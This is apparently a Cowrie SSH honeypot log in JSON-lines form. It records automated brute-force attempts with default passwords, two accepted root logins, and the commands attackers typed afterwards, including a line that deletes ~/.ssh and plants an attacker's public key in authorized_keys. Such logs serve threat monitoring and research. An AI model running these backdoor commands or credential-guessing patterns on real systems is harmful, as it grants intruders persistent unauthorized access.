{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:11.253606Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:12.000365Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T13:45:12.001224Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:12.328442Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.closed","duration":"30.7","message":"Connection lost after 30.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:12.330217Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55132,"dst_ip":"1.2.3.4","dst_port":22,"session":"499c70917f12","protocol":"ssh","message":"New connection: 212.227.125.160:55132 (1.2.3.4:22) [session: 499c70917f12]","sensor":"my-vps","timestamp":"2025-08-26T13:45:15.027163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:45:15.037544Z","src_ip":"212.227.125.160","session":"499c70917f12"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:45:15.270612Z","src_ip":"212.227.125.160","session":"499c70917f12"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T13:45:19.576379Z","src_ip":"212.227.125.160","session":"499c70917f12"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:21.550111Z","src_ip":"212.227.125.160","session":"499c70917f12"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T13:45:22.045122Z","src_ip":"212.227.125.160","session":"018517c8b559"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54572,"dst_ip":"1.2.3.4","dst_port":22,"session":"25088f95c6d0","protocol":"ssh","message":"New connection: 212.227.235.229:54572 (1.2.3.4:22) [session: 25088f95c6d0]","sensor":"my-vps","timestamp":"2025-08-26T13:45:23.204164Z"}
{"eventid":"cowrie.session.closed","duration":"40.3","message":"Connection lost after 40.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:32.002313Z","src_ip":"212.227.125.160","session":"018517c8b559"}
{"eventid":"cowrie.session.closed","duration":120.00933623313904,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:53.345511Z","src_ip":"14.160.154.91","session":"445d5eb2c2ca"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":51886,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeedebbf7ec9","protocol":"ssh","message":"New connection: 167.99.49.89:51886 (1.2.3.4:22) [session: aeedebbf7ec9]","sensor":"my-vps","timestamp":"2025-08-26T13:46:06.369053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:46:06.369726Z","src_ip":"167.99.49.89","session":"aeedebbf7ec9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:46:06.460363Z","src_ip":"167.99.49.89","session":"aeedebbf7ec9"}
{"eventid":"cowrie.login.failed","username":"test01","password":"test01","message":"login attempt [test01/test01] failed","sensor":"my-vps","timestamp":"2025-08-26T13:46:06.864589Z","src_ip":"167.99.49.89","session":"aeedebbf7ec9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:46:07.957340Z","src_ip":"167.99.49.89","session":"aeedebbf7ec9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57156,"dst_ip":"1.2.3.4","dst_port":22,"session":"239d4404a1e4","protocol":"ssh","message":"New connection: 212.227.235.229:57156 (1.2.3.4:22) [session: 239d4404a1e4]","sensor":"my-vps","timestamp":"2025-08-26T13:46:19.600447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:46:19.601213Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:46:19.831236Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.login.success","username":"root","password":"virus","message":"login attempt [root/virus] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:46:20.797838Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:46:21.322136Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:46:21.322938Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:46:21.323925Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:46:21.554813Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:46:22.034047Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:46:22.034765Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:46:22.267571Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:46:22.268431Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41034,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c0f0280f6b6","protocol":"ssh","message":"New connection: 212.227.235.229:41034 (1.2.3.4:22) [session: 1c0f0280f6b6]","sensor":"my-vps","timestamp":"2025-08-26T13:46:22.496272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:46:22.497133Z","src_ip":"212.227.235.229","session":"1c0f0280f6b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:46:22.726593Z","src_ip":"212.227.235.229","session":"1c0f0280f6b6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:46:24.438147Z","src_ip":"212.227.235.229","session":"1c0f0280f6b6"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:46:25.674020Z","src_ip":"212.227.235.229","session":"1c0f0280f6b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41046,"dst_ip":"1.2.3.4","dst_port":22,"session":"28ebadd4f548","protocol":"ssh","message":"New connection: 212.227.235.229:41046 (1.2.3.4:22) [session: 28ebadd4f548]","sensor":"my-vps","timestamp":"2025-08-26T13:46:25.915795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:46:25.916826Z","src_ip":"212.227.235.229","session":"28ebadd4f548"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:46:26.157307Z","src_ip":"212.227.235.229","session":"28ebadd4f548"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:46:27.194723Z","src_ip":"212.227.235.229","session":"28ebadd4f548"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:46:27.435120Z","src_ip":"212.227.235.229","session":"239d4404a1e4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:46:27.437618Z","src_ip":"212.227.235.229","session":"28ebadd4f548"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50884,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7dfd2d28bfd","protocol":"ssh","message":"New connection: 212.227.125.160:50884 (1.2.3.4:22) [session: e7dfd2d28bfd]","sensor":"my-vps","timestamp":"2025-08-26T13:46:37.239596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:46:37.586272Z","src_ip":"212.227.125.160","session":"e7dfd2d28bfd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:46:37.638712Z","src_ip":"212.227.125.160","session":"e7dfd2d28bfd"}
{"eventid":"cowrie.login.failed","username":"config","password":"config","message":"login attempt [config/config] failed","sensor":"my-vps","timestamp":"2025-08-26T13:46:39.443900Z","src_ip":"212.227.125.160","session":"e7dfd2d28bfd"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:46:40.968500Z","src_ip":"212.227.125.160","session":"e7dfd2d28bfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50658,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1d493c05dd8","protocol":"ssh","message":"New connection: 212.227.125.160:50658 (1.2.3.4:22) [session: e1d493c05dd8]","sensor":"my-vps","timestamp":"2025-08-26T13:46:57.685353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:46:57.766367Z","src_ip":"212.227.125.160","session":"e1d493c05dd8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hm